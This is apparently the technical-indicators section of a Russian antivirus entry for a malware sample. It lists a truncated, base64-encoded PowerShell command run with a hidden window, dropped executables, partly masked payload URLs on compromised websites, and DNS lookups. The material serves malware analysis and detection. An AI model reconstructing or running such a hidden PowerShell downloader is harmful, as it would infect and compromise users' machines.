Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQB0AC0AdgBBAHIASQBBAGIATABlACAAKAAiADQAUABHACIAKwAiADMAcgAyACIAKQAgACgAIABbAHQAeQBQAGUAXQAoACIAewA1AH0AewA2AH0AewA0AH0AewAzAH0AewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1576
- %TEMP%\1070229.cvr
- %HOMEPATH%\dy83lif\rn6ielv\phalbcyh.exe
- %HOMEPATH%\dy83lif\rn6ielv\phalbcyh.exe
- http://mu##ri.es/wp-content/h/
- http://th####dio-ct.co.uk/events/P3/
- http://ka##aasa.ca/wp-admin/zeJssVj/
- http://ka##aasa.ca/cgi-sys/suspendedpage.cgi
- http://ad###ro.com.br/eleicao/EJcX/
- http://eq####mentosmix.com/10/Bjky/
- DNS ASK mu##ri.es
- DNS ASK hr#####nationalbd.com
- DNS ASK th####dio-ct.co.uk
- DNS ASK ka##aasa.ca
- DNS ASK kh####culongdien.vn
- DNS ASK ad###ro.com.br
- DNS ASK co##fit.in
- DNS ASK eq####mentosmix.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQB0AC0AdgBBAHIASQBBAGIATABlACAAKAAiADQAUABHACIAKwAiADMAcgAyACIAKQAgACgAIABbAHQAeQBQAGUAXQAoACIAewA1AH0AewA2AH0AewA0AH0AewAzAH0AewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIA...' (со скрытым окном)